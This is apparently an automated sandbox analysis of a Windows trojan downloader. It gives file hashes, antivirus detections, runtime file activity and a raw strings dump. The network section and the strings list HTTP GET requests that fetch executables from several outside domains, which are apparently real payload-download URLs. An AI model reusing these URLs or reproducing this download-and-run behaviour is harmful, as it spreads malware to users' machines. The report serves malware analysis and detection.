Analysis Date: 2015-01-14 12:19:21
MD5: d160b25b6d28cce33c04ba45e771c60c
SHA1: fc958ec964e8f91fb7fa19e4a2f55ab24d0fde10

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 3ab7719984b7154b4db2c7fc333bf707 sha1: be33e716a5ecd4726fc3de7da48a8721cd2eee8c size: 540672
Section: .rdata md5: 18f42deefb7dc45699319d4eccd7fe9b sha1: a7db61dc987b08fe0edc5255c95267373eeb5eab size: 81920
Section: .data md5: 41b270b81709fe21584d507a06779526 sha1: 9756874e54947f0c3868a816405f028c81b7865b size: 73728
Section: .rsrc md5: 951cbe952550cc884883d9b40ad4cb42 sha1: 273c0f05f8fe9e7bd126c0116270234d8daf3e88 size: 69632
Timestamp: 2015-01-07 10:09:46
Version:
LegalCopyright: 作者版权所有 请尊重并使用正版
FileVersion: 1.0.0.0
Comments: 本程序使用易语言编写(http://www.eyuyan.com)
ProductName: 易语言程序
ProductVersion: 1.0.0.0
FileDescription: 易语言程序
Packer: Microsoft Visual C++ v6.0
PEhash: a55b53f9d383f809c6a6ad01df9b6540531b9a3c
IMPhash: 00e9ff8f7dab1222a9b3bb07bbeddc7e
AV 360 Safe: no_virus
AV Ad-Aware: Trojan.Generic.12504467
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Arcabit (arcavir): Trojan.Generic.12504467
AV Authentium: W32/Agent.EW.gen!Eldorado
AV Avira (antivir): TR/Agent.770048.234
AV BullGuard: Trojan.Generic.12504467
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): no_virus
AV ClamAV: no_virus
AV Dr. Web: no_virus
AV Emsisoft: Trojan.Generic.12504467
AV Eset (nod32): no_virus
AV Fortinet: W32/Badur.MSEK!tr
AV Frisk (f-prot): W32/Agent.EW.gen!Eldorado
AV F-Secure: Trojan.Generic.12504467
AV Grisoft (avg): Win32/DH{IEGBDwCBEyIlV2dO}
AV Ikarus: no_virus
AV K7: no_virus
AV Kaspersky: Trojan.Win32.Badur.msek
AV MalwareBytes: Spyware.OnlineGames
AV Mcafee: no_virus
AV Microsoft Security Essentials: no_virus
AV MicroWorld (escan): no_virus
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: no_virus
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): Trojan-Downloader.EIC.7121

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Crypto\RSA\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\a18ca4003deb042bbee7a40f15e1970b_666939c9-243b-475e-9504-51724db22670
Creates File: C:\malware.exe
Creates File: PIPE\lsarpc

Network Details:

HTTP GET: http://www.huohuasheji.com/kuplay_930_874824.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP GET: http://www.cdhomexpo.cn/ffdy_434_874824.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP GET: http://down.xiaoxinrili.com/hezi/jm/ad7147.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP GET: http://down.qunasou.com/tq/tq_b_80282.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP GET: http://4006869752.com/admin/get.php?user=114lm&id=22338&index=7
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP GET: http://j.union.ijinshan.com/jump.php?u_key=389775
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP GET: http://down.9vh.net/apples_19_708.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP GET: http://down.tianyunxj.com/14/tqrl_93_708.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Raw Pcap

Strings
....  ................
"#
....
.
.........
10/.-,+*)('&%$#"! ..............
.....
..........
..
.PNG
.
: ''..
...
.........
-
..
.0[]: 
.
.
 
 
 
 
@
@
.
 
.
.
..
.
..
.
.
.0
x
.
==
...
.
 
-% BbmHpAadYySMI \
.-E-0-0..
00-+ 
e
 
00...........?-  
0
0 
0
?
u

    
 ......
 (*.*)
#####
#######
080404B0
 %1 
1.0.0.0
	1uM
(&C)
Comments
	Ctrl+
	Ctrl+D
	Ctrl+End
	Ctrl+G
	Ctrl+Home
	Ctrl+N
	Ctrl+PageDown
	Ctrl+PageUp
	&D.
DEFAULT_ICON
 DLL 
(&E)
FileDescription
FileVersion
         (((((                  H
(&H)
Hjjj
Hjjjj
Hjjjjjjjj
(http://www.eyuyan.com)
(&I)
 INI 
jjjj
jjjjjj
LegalCopyright
msctls_progress32
msctls_updown32
MS Shell Dlg
(&N)
(null)
(&O)
(&P)
	PageDown
	PageUp
(<Pcw
ProductName
ProductVersion
Progress1
 %s 
(&S)
	Shift+Tab
Spin1
StringFileInfo
(&T)
	Tab/Enter
TEXTINCLUDE
Translation
VarFileInfo
VS_VERSION_INFO
xxxx
^,_^][
^$_^[]
 (*.*)|*.*||
[================================]
	!	!	!	!	
								
																																																																
00003333
0123456789ABCDEF
(&07-034/)7 '
0B=(tJ
0dk:ghV
 0@P`p
0R>\W[
!101)! !
123456789
)141!141
141B{y{)kik1
,1"52.*
1),)9JMJ9
!1AQaq
1#QNAN
1#SNAN
	2	5	5	5	5	5
"2BRbr
%+.2d%.2d
;=3333v
#3CScs
3;L$4s
$4DTdt
4i5U6B738%9
\$4t|Ht@H
|?5^<@
5	!	!	!	!
	5	5	5
%5EUeu
5F99C1642A2F4e03850721B4F5D7C3F8
	6	6	6	6
	6	6	6	6	6	6	6	6	6	6	,	,	,	,	,	,	,	,	+	+	+	+	+	/	/	/	'	'	'	'	'	'	'	'	'	'	(	(	(	(	(	(	(	(	(	(	(	(	(	
&6FVfv
707ca37322474f6ca841f0e224f4b620
	7	7	7	7	7	7	7	7	7	7	7	*	*	-	-	-	-
'7GWgw
7wwgwwv
7wwwwwv
(8HXhx
8MThdu
\$8UVW
9^0u/j
91419JMJ9sqs1
91419Z]Z9
989!cec
9|$8tt
'9A`u"9
9BAB9BAB9BAB9BAB99<9B9<9BBAB9BAB9),)B
9D$$t+
)9IYiy
9L$x~k
9l$xtU9
9nPu	9^T
9o4u'V
	9oTtc
9t$0v8
~(9~$u
9^xu5j
<A|2<Z
a background color must be supplied to remove alpha/transparency
abcddefghijklmnoopqrrsstuvvwwxyyz;
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
abnormal program termination
Accept:
Accept: */*
Accept: */* 
Accept-Language:
Accept-Language: zh-cn
%a, %d %b %Y %H:%M:%S 
AdjustWindowRectEx
advapi32.dll
Advapi32.dll
ADVAPI32.dll
AfxControlBar42s
AfxFrameOrView42s
AfxMDIFrame42s
AfxOldWndProc423
AfxOleControl42s
AfxWnd42s
Afx:%x:%x
Afx:%x:%x:%x:%x:%x
AppendMenuA
Application built with libpng-
Application must supply a known background gamma
Arg list too long
.?AUCThreadData@@
August
.?AV_AFX_BASE_MODULE_STATE@@
.?AV_AFX_CHECKLIST_STATE@@
.?AV_AFX_COLOR_STATE@@
.?AV_AFX_CTL3D_STATE@@
.?AV_AFX_CTL3D_THREAD@@
.?AVAFX_MODULE_STATE@@
.?AVAFX_MODULE_THREAD_STATE@@
.?AV_AFX_SOCK_STATE@@
.?AV_AFX_THREAD_STATE@@
.?AV_AFX_WIN_STATE@@
.?AVCArchiveException@@
.?AVCBitmap@@
.?AVCBrush@@
.?AVCButton@@
.?AVCClientDC@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCColorDialog@@
.?AVCComboBox@@
.?AVCCommonDialog@@
.?AVCCriticalSection@@
.?AVCDC@@
.?AVCDialog@@
.?AVCDWordArray@@
.?AVCEdit@@
.?AVCException@@
.?AVCFile@@
.?AVCFileDialog@@
.?AVCFileException@@
.?AVCGdiObject@@
.?AVCHandleMap@@
.?AVCImageList@@
.?AVCMapPtrToPtr@@
.?AVCMapStringToPtr@@
.?AVCMemFile@@
.?AVCMemoryException@@
.?AVCMenu@@
.?AVCNoTrackObject@@
.?AVCNotSupportedException@@
.?AVCObject@@
.?AVCPaintDC@@
.?AVCPen@@
.?AVCProgressCtrl@@
.?AVCPtrArray@@
.?AVCPtrList@@
.?AVCResourceException@@
.?AVCRgn@@
.?AVCSessionMapPtrToPtr@@
.?AVCSharedFile@@
.?AVCSimpleException@@
.?AVCStatic@@
.?AVCStringArray@@
.?AVCSyncObject@@
.?AVCTempDC@@
.?AVCTempGdiObject@@
.?AVCTempImageList@@
.?AVCTempMenu@@
.?AVCTempWnd@@
.?AVCTestCmdUI@@
.?AVCToolTipCtrl@@
.?AVCUserException@@
.?AVCWinApp@@
.?AVCWindowDC@@
.?AVCWinThread@@
.?AVCWnd@@
.?AVCWordArray@@
.?AVtype_info@@
<A|@<Z
B 02CV
BAB!{}{
)BAB1BABB
BAB9RQR1
bad adaptive filter value
Bad address
bad background index (internal error)
bad color-map processing (internal error)
bad compression info
bad compression method
bad data option (internal error)
bad encoding (internal error)
Bad file descriptor
bad height format
bad keyword
bad longjmp: 
bad parameters to zlib
bad processing option (internal error)
bad width format
= baLt = ZYXt
B#C0D?EQFeG|H
bcdfghijklmnpqrstuvwxyz
BeginPaint
BeginPath
BitBlt
BKbhTb~XBK!;
bKGD must be after
Bkik1{y{)141B
 (*.BMP)|*.BMP|GIF
Bogus message code %d
Broken pipe
BRPj+S
buffer error
 but running with 
C =02CVu
CallNextHookEx
Call to NULL read function
CallWindowProcA
Can't set both read_data_fn and write_data_fn in the same structure
=capst
CArchiveException
C:\BaiduAn.Setup.1117.3.0.0.3974_1000163887.exe
C:\Baidusd.Setup.3.0.0.4607.youqian_1000163887.exe
C:\bdBrowserSetup-5955-ftn_1000163887.exe
CBitmap
CBrush
CButton
CClientDC
CCmdTarget
CColorDialog
CColourPicker
CComboBox
CCriticalSection
Cc: %s
CDialog
CDWordArray
cec!101
CException
CFileDialog
CFileException
CGdiObject
CharUpperA
CheckMenuItem
ChildWindowFromPointEx
ChooseColorA
cHRM chunk does not match sRGB
CImageList
ck(WSbpS
ClientToScreen
CloseClipboard
CloseDatabase
CloseHandle
ClosePrinter
CLSIDFromString
CMapPtrToPtr
CMapStringToPtr
CMemFile
CMemoryException
CNotSupportedException
CObject
color-map index out of range
color map overflow (BAD internal error)
CombineRgn
combobox
COMCTL32.dll
COMCTL32.DLL
comdlg32.dll
commctrl_DragListMsg
commdlg_ColorOK
commdlg_FileNameOK
commdlg_help
commdlg_LBSelChangedNotify
commdlg_SetRGBColor
commdlg_ShareViolation
CompareStringA
CompareStringW
conflicting calls to set alpha mode and background
Content-Transfer-Encoding: base64
Content-Type:
Content-Type: application/x-www-form-urlencoded
Content-type: multipart/mixed; boundary="#BOUNDARY#"
Content-type: text/plain; charset="
Cookie: 
CopyAcceleratorTableA
CopyRect
copyright violation: edited ICC profile ignored
CPaintDC
CPalette
CProgressCtrl
CPtrArray
CPtrList
CRC error
CreateAcceleratorTableA
CreateBitmap
CreateCompatibleBitmap
CreateCompatibleDC
CreateDCA
CreateDialogIndirectParamA
CreateDIBitmap
CreateEllipticRgn
CreateEventA
CreateFileA
CreateFontIndirectA
CreateIconFromResource
CreateIconFromResourceEx
CreateMenu
CreatePalette
CreatePen
CreatePolygonRgn
CreatePopupMenu
CreateProcessA
CreateRectRgn
CreateRectRgnIndirect
CreateRoundRectRgn
CreateSemaphoreA
CreateSolidBrush
CreateThread
CreateWindowExA
CResourceException
CryptAcquireContextA
CryptCreateHash
CryptDestroyHash
CryptGetHashParam
CryptHashData
CryptReleaseContext
CSharedFile
CStatic
CStringArray
CSyncObject
CTempDC
CTempGdiObject
CTempImageList
CTempMenu
CTempWnd
CToolTipCtrl
Ctrl+A
Ctrl+B
Ctrl+C
Ctrl+D
Ctrl+E
Ctrl+F
Ctrl+F1
Ctrl+F10
Ctrl+F11
Ctrl+F12
Ctrl+F2
Ctrl+F3
Ctrl+F4
Ctrl+F5
Ctrl+F6
Ctrl+F7
Ctrl+F8
Ctrl+F9
Ctrl+G
Ctrl+H
Ctrl+I
Ctrl+J
Ctrl+K
Ctrl+L
Ctrl+M
Ctrl+N
Ctrl+O
Ctrl+P
Ctrl+Q
Ctrl+R
Ctrl+S
Ctrl+Shift+F1
Ctrl+Shift+F10
Ctrl+Shift+F11
Ctrl+Shift+F12
Ctrl+Shift+F2
Ctrl+Shift+F3
Ctrl+Shift+F4
Ctrl+Shift+F5
Ctrl+Shift+F6
Ctrl+Shift+F7
Ctrl+Shift+F8
Ctrl+Shift+F9
Ctrl+T
Ctrl+U
Ctrl+V
Ctrl+W
Ctrl+X
Ctrl+Y
Ctrl+Z
 (*.CUR)|*.CUR|
CUserException
CWinApp
CWindowDC
CWinFormUnit
CWinThread
CWordArray
?? / %d]
D$ _^][
D$,_^]
D$,;\$|
D$(_^]
D$(_^][
D$$_^[
D$$_^]
d09f2340818511d396f6aaf844c7e325
D$0QVRP
D$0UhP
D$0UVW
D$0WPQ
D$ |2;
D$49D$$}
D$4RPQ
D$4SUV
D$4SUVW
D$89Vdu
D$(8D*
D$8QVRPU
D$8RPj
D$8VPQ
D$$~9+
damaged LZ stream
@.data
data error
Date: %s
D$(CM;
D$(CUSWP
 %d/%d 
(%d-%d):
%d / %d
%d / %d]
dddd, MMMM dd, yyyy
DDDDUUUU
D$dQUWRP
D$dSUVW
D$DURP
December
DEFAULT_ICON
#define _AFX_NO_OLE_RESOURCES
#define _AFX_NO_PROPERTY_RESOURCES
#define _AFX_NO_TRACKER_RESOURCES
 deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly 
DefWindowProcA
D$ EJ;
DELETE
DeleteCriticalSection
?=deleted
DeleteDC
DeleteFileA
DeleteMenu
DeleteObject
DestroyAcceleratorTable
DestroyCursor
DestroyIcon
DestroyMenu
DestroyWindow
device
devices
D$(FO;
D$H_^][
D$hQRP
D$hRQP
D$hSUV3
D$HUPQ
D$HUWRPQ
D$Hvm3
D$,Hx;@
Directory not empty
DispatchMessageA
DISPLAY
D$(;l$ 
D$\L>J
DllRegisterServer
DllUnregisterServer
D$LPUj
D$LUSWP
DocumentPropertiesA
Domain error
DOMAIN error
D$,Pj<j
D$ PQR
D$PQRP
D$PRPQ
DPtoLP
D$(QPW
D$(QRP
D$$QRP
D$@QRPU
D$$QUP
DrawEdge
DrawFocusRect
DrawFrameControl
DrawIconEx
DrawTextA
D$@RPQj
D$ RPUhD
D$$RSSP
D$,RVh
;D$<s!
D$,SPh
D$$SPh
D$(SUV
D$$SUV
D$(SUW
D$TRPW
D$TVPW
duplicate
DuplicateHandle
duplicate sRGB information ignored
D$@UPQ
|$D UV
D/ VPS
D$@WPS
D$Xht8J
D$XPQU
D$XQRWP
;D$xt&
ech1Y%
E=FZGrH
EHPWVS
Ellipse
EmptyClipboard
empty distance tree with lengths
EnableMenuItem
EnableWindow
EndDialog
EndDoc
#endif
#endif //_WIN32
EndPage
EndPaint
EndPath
EnterCriticalSection
EnumDisplayMonitors
EnumDisplaySettingsA
eQpenc
EqualRect
error in user chunk
Escape
ETLPuF
ExcludeClipRect
Exec format error
ExitProcess
extra compressed data
Extra compressed data
ExtSelectClipRgn
ExtTextOutA
Ex@u	U
F<_^][
F,_^][
F\_^][
F09^4u*j
F49^8u&j
F89^8u&j
F(9V8tQ
Fdf+Fh
FD@ul9L$(}f
FD uy9D$$}s
February
F(_+F$^[;E
?fff&ff23
@ffffff
$@ffffff
F$@;F(v
F$@@;F(v
file error
File exists
Filename too long
FileTimeToLocalFileTime
FileTimeToSystemTime
File too large
FillRect
FillRgn
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
F\jLSP
- floating point not loaded
FlushFileBuffers
forcing save of an unhandled chunk; please call png_set_keep_unknown_chunks
FpHt&Ht
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
Friday
From: %s
[/fS_MR
Function not implemented
Fxt_;FTu@
ga-alpha color-map: too few entries
GAIsProcessorFeaturePresent
gamma table being rebuilt
gamma value does not match libpng estimate
gamma value does not match sRGB
gamma value out of range
g~b1Y%
gb2312
=?gb2312?B?
Gdi32.dll
GDI32.dll
GetACP
GetActiveWindow
GetBkColor
GetBkMode
GetCapture
GetClassInfoA
GetClassLongA
GetClassNameA
GetClientRect
GetClipboardData
GetClipBox
GetClipRgn
GetCommandLineA
GetConnectString
GetCPInfo
GetCurrentObject
GetCurrentProcess
GetCurrentThread
GetCurrentThreadId
GetCursorPos
GetDesktopWindow
GetDeviceCaps
GetDIBits
GetDlgCtrlID
GetDlgItem
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileAttributesA
GetFileSize
GetFileTime
GetFileTitleA
GetFileType
GetFocus
GetForegroundWindow
GetFullPathNameA
GetKeyState
GetLastActivePopup
GetLastError
GetLocalTime
GetMenu
GetMenuCheckMarkDimensions
GetMenuItemCount
GetMenuItemID
GetMenuState
GetMessageA
GetMessagePos
GetMessageTime
GetModuleFileNameA
GetModuleHandleA
GetMonitorInfoA
GetNextDlgTabItem
GetObjectA
GetOEMCP
GetOpenFileNameA
GetParent
GetPolyFillMode
GetProcAddress
GetProcessHeap
GetProcessVersion
GetProfileStringA
GetPropA
GetROP2
GetSaveFileNameA
GetScrollPos
GetScrollRange
GetStartupInfoA
GetStdHandle
GetStockObject
GetStretchBltMode
GetStringTypeA
GetStringTypeW
GetSubMenu
GetSysColor
GetSysColorBrush
GetSystemMenu
GetSystemMetrics
GetSystemPaletteEntries
GetSystemTime
GetTabList
GetTextColor
GetTextExtentPoint32A
GetTextMetricsA
GetTickCount
GetTimeZoneInformation
GetTopWindow
GetVersion
GetVersionExA
GetViewportExtEx
GetViewportOrgEx
GetVolumeInformationA
GetWindow
GetWindowDC
GetWindowExtEx
GetWindowLongA
GetWindowOrgEx
GetWindowPlacement
GetWindowRect
GetWindowTextA
GetWindowTextLengthA
 (*.GIF)|*.GIF|
GlobalAddAtomA
GlobalAlloc
GlobalDeleteAtom
GlobalFindAtomA
GlobalFlags
GlobalFree
GlobalGetAtomNameA
GlobalHandle
__GLOBAL_HEAP_SELECTED
GlobalLock
GlobalReAlloc
GlobalSize
GlobalUnlock
gray[16] color-map: too few entries
gray[8] color-map: too few entries
gray-alpha color-map: too few entries
gray+alpha color-map: too few entries
Gray color space not permitted on RGB PNG
GrayStringA
`h````
h9n`u;
h BGRUPV
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
hgjlkbrfzaoe
HHtiHtGH
HHtpHHtl
hIST must be after
hknilUPV
H:mm:ss
hPCCiU
|$HPWS
HrCg@b	g 
HSVHWtgHHtF
hTADIV
HtfHt;Ht
Ht#HHt
HtHHt(
HtHHuz
Ht]Ht2Ht
Ht&HtcI
HtOHt)H
htsbaUQV
HtTHtFHt8Ht*Ht
http://
HTTP/1.0
HTTP/1.1
HttpOpenRequestA
HttpQueryInfoA
https://
HttpSendRequestA
http://www.cdhomexpo.cn/ffdy_434_874824.exe
http://www.huohuasheji.com/kuplay_930_874824.exe
hWj@_;
hYARGUQV
_hypot
ICC profile tag outside profile
ICC profile tag start not a multiple of 4
 (*.ICO)|*.ICO|
#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_CHS)
#ifdef _WIN32
ignored in grayscale PNG
Ignoring invalid time value
ignoring out of range rgb_to_gray coefficients
Illegal byte sequence
Image height exceeds user limit in IHDR
Image height is zero in IHDR
ImageList_Destroy
Image width exceeds user limit in IHDR
Image width is zero in IHDR
Improper link
Inappropriate I/O control operation
#include "l.chs\afxres.rc"          // Standard components
incompatible version
incomplete distance tree
incomplete dynamic bit lengths tree
incomplete literal/length tree
inconsistent chromaticities
inconsistent rendering intents
incorrect data check
incorrect header check
 inflate 1.1.3 Copyright 1995-1998 Mark Adler 
InflateRect
InitCommonControlsEx
InitializeCriticalSection
Input/output error
insufficient memory
Insufficient memory for hIST chunk data
Insufficient memory for pCAL parameter
Insufficient memory for pCAL params
Insufficient memory for pCAL purpose
Insufficient memory for pCAL units
Insufficient memory to process text chunk
insufficient memory to read chunk
intent outside defined range
InterlockedDecrement
InterlockedIncrement
internal error: array alloc
internal error: array realloc
internal error checking chromaticities
internal error handling cHRM coefficients
internal error handling cHRM->XYZ
internal row logic error
internal row size calculation error
internal row width error
internal sequential row size calculation error
InternetCanonicalizeUrlA
InternetCloseHandle
InternetConnectA
InternetCrackUrlA
InternetOpenA
InternetReadFile
InternetSetOptionA
Interrupted function call
IntersectRect
invalid
invalid after png_start_read_image or png_read_update_info
invalid alpha mode
Invalid argument
InvalidateRect
Invalid attempt to read row data
invalid background gamma type
invalid before the PNG header has been read
Invalid bit depth in IHDR
invalid bit length repeat
invalid block type
invalid chromaticities
invalid chunk type
Invalid color type/bit depth combination in IHDR
Invalid color type in IHDR
invalid data
invalid distance code
invalid embedded Abstract ICC profile
invalid error action to rgb_to_gray
Invalid filter method in IHDR
Invalid format for pCAL parameter
invalid ICC profile color space
Invalid IHDR data
Invalid image height in IHDR
Invalid image width in IHDR
invalid index
invalid length
invalid literal/length code
invalid location in png_set_unknown_chunks
invalid memory read
Invalid palette
Invalid palette length
Invalid palette size, hIST allocation skipped
invalid parameter count
Invalid pCAL equation type
Invalid pCAL parameter count
invalid PNG color type
invalid rendering intent
Invalid sCAL height
Invalid sCAL unit
Invalid sCAL width
Invalid seek
invalid signature
invalid sRGB rendering intent
invalid stored block lengths
invalid unit
invalid user transform pixel depth
invalid values
invalid window size
invalid with alpha channel
IQh,bJ
Is a directory
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
IsChild
IsDialogMessageA
IsIconic
IsRectEmpty
IsWindow
IsWindowEnabled
IsWindowVisible
IsZoomed
JanFebMarAprMayJunJulAugSepOctNovDec
January
JPEGMEM
 (*.JPG)|*.JPG|PNG
 (*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
j VUPWQ
*:JZjz
KERNEL32
kernel32.dll
Kernel32.dll
KERNEL32.dll
KillTimer
+;K[k{
)kmk1{}{1141B
known incorrect sRGB profile
LANGUAGE 4, 2
LCMapStringA
LCMapStringW
LeaveCriticalSection
length does not match profile
l	g~b0R 
l	g~b0Rdk
libpng does not support gamma+background+rgb_to_gray
libpng error: %s
libpng warning: %s
LineTo
LoadBitmapA
LoadCursorA
LoadIconA
LoadImageA
LoadLibraryA
LoadResource
LoadStringA
LocalAlloc
LocalFree
LocalReAlloc
location:
Location:
LockFile
LockResource
lost/gained channels
lost rgb to gray
LPtoDP
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
mailto:
malformed sPLT chunk
MapWindowPoints
M/d/yy
Memory allocation failed while processing sCAL
MessageBoxA
MGridCells
Microsoft Visual C++ Runtime Library
midiOutPrepareHeader
midiOutReset
midiOutUnprepareHeader
midiStreamClose
midiStreamOpen
midiStreamOut
midiStreamProperty
midiStreamRestart
midiStreamStop
 (*.MID)|*.MID|
MIME-Version: 1.0
missing IHDR
Missing IHDR before IDAT
missing LZ dictionary
Missing PLTE before IDAT
-=M]m}
MNG features are not allowed in a PNG datastream
ModifyMenuA
Monday
MonitorFromPoint
MonitorFromRect
MonitorFromWindow
MoveFileA
MoveToEx
MoveWindow
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Mpr.dll
MS Sans Serif
MS Shell Dlg
__MSVCRT_HEAP_SELECT
MulDiv
MultiByteToWideChar
need dictionary
No child processes
No error
No locks available
non-positive height
non-positive width
no space in chunk cache
No space in chunk cache for sPLT
No space left on device
No such device
No such device or address
No such file or directory
No such process
Not a directory
Not a PNG file
Not enough image data
Not enough space
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
nt2Ht#Ht
NTRPQj
(null)
NULL row buffer
October
OffsetRect
OffsetViewportOrgEx
ole32.dll
OLEAUT32.dll
OleInitialize
OleUninitialize
OpenClipboard
OpenDatabase
OpenPrinterA
Operation not permitted
O(uckHr
out-of-date sRGB profile with no signature
out of memory
Out of memory
out of place
out.prn
output gamma out of expected range
oversubscribed distance tree
oversubscribed dynamic bit lengths tree
oversubscribed literal/length tree
OX[0R 
~P9~Pun
PA#define _AFX_NO_SPLITTER_RESOURCES
palette color-map: too few entries
Palette is NULL in indexed image
PatBlt
PathToRegion
.PAVCArchiveException@@
.PAVCException@@
.PAVCFileException@@
.PAVCMemoryException@@
.PAVCNotSupportedException@@
.PAVCObject@@
.PAVCResourceException@@
.PAVCSimpleException@@
.PAVCUserException@@
PCS illuminant is not D50
PeekMessageA
Permission denied
Ph_^][Y
P#include "afxres.h"
png_do_encode_alpha: unexpected call
png_do_quantize returned rowbytes=0
png_do_rgb_to_gray found nongray pixel
PNG file corrupted by ASCII conversion
PNG fixed point integer out of range
png_image_begin_read_from_memory: incorrect PNG_IMAGE_VERSION
png_image_begin_read_from_memory: invalid argument
png_image_finish_read[color-map]: no color-map
png_image_finish_read: damaged PNG_IMAGE_VERSION
png_image_finish_read: invalid argument
png_image_read: alpha channel lost
png_image_read: opaque pointer not NULL
png_image_read: out of memory
 (*.PNG)|*.PNG|BMP
png_read_image: invalid transformations
png_read_image: unsupported transformation
png_read_update_info/png_start_read_image: duplicate call
png_set_filler: inappropriate color type
png_set_filler is invalid for low bit depth gray output
png_set_keep_unknown_chunks: invalid keep
png_set_keep_unknown_chunks: no chunk list
png_set_keep_unknown_chunks: too many chunks
png_set_sPLT: invalid sPLT
png_set_unknown_chunks now expects a valid location
PNG unsigned integer out of range
PostMessageA
PostQuitMessage
Potential overflow in png_zalloc()
#pragma code_page(936)
PreviewPages
 (*.prn)|*.prn|
profile '
Program: 
<program name unknown>
PtInRect
PtVisible
- pure virtual function call
RaiseException
RASAPI32.dll
RasGetConnectStatusA
RasHangUpA
`.rdata
read beyond end of data
Read Error
ReadFile
Read-only file system
RealizePalette
Rectangle
RectVisible
RedrawWindow
Referer:
Referer: 
RegCloseKey
RegCreateKeyExA
RegisterClassA
RegisterClipboardFormatA
RegisterWindowMessageA
RegOpenKeyExA
RegQueryValueA
RegSetValueExA
ReleaseCapture
ReleaseDC
ReleaseSemaphore
RemovePlayer
RemovePropA
Reply-To: %s
Resource deadlock avoided
Resource device
resource.h
Resource temporarily unavailable
RestoreDC
Result too large
ResumeThread
rgb-alpha color-map: too few entries
rgb+alpha color-map: too few entries
rgb color-map: too few entries
RGB color space not permitted on grayscale PNG
rgb[ga] color-map: too few entries
rgb[gray] color-map: too few entries
RoundRect
Row has too many bytes to allocate in memory
RtlUnwind
=rtrpt =rncst
runtime error 
Runtime Error!
RUR)9<9
RVPUSQ
Saturday
SaveDC
Saving unknown chunk:
ScaleViewportExtEx
ScaleWindowExtEx
ScreenToClient
ScrollWindowEx
SelectClipRgn
SelectObject
SelectPalette
SendDlgItemMessageA
SendMessageA
September
sequential row overflow
SetActiveWindow
SetBkColor
SetBkMode
SetCapture
SetClipboardData
Set-Cookie
Set-Cookie:
SetCurrentDirectoryA
SetCursor
SetCursorPos
SetEndOfFile
SetEnvironmentVariableA
SetErrorMode
SetEvent
SetFilePointer
SetFocus
SetForegroundWindow
SetHandleCount
SetLastError
SetMapMode
SetMenu
SetMenuItemBitmaps
SetParent
SetPolyFillMode
SetPropA
SetRect
SetRectEmpty
SetROP2
SetScrollPos
SetScrollRange
SetStdHandle
SetStretchBltMode
SetTextColor
SetTimer
Settings
SetUnhandledExceptionFilter
SetViewportExtEx
SetViewportOrgEx
SetWindowExtEx
SetWindowLongA
SetWindowOrgEx
SetWindowPos
SetWindowRgn
SetWindowsHookExA
SetWindowTextA
Shell32.dll
SHELL32.dll
ShellExecuteA
Shell_NotifyIconA
\shell\open\command
Shift+F1
Shift+F10
Shift+F11
Shift+F12
Shift+F2
Shift+F3
Shift+F4
Shift+F5
Shift+F6
Shift+F7
Shift+F8
Shift+F9
ShowWindow
SING error
sO;>|C;~
software
sPLT chunk has bad length
sPLT chunk requires too much memory
sPLT chunk too long
sPLT out of memory
)sqs){}{
sqs)! !9
%s <%s>
SS@SSPVSS
_SSSSU
StartDocA
StartPage
stream end
stream error
StretchBlt
Subject: %s
Sunday
SunMonTueWedThuFriSat
sus))()B
SWVVVRPV
System
SystemParametersInfoA
TabbedTextOutA
tag count too large
TerminateProcess
text chunk: out of memory
text compression mode is out of range
TextOutA
T/f&Tcknx
<]t_G<-uA
!This program cannot be run in DOS mode.
Thursday
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
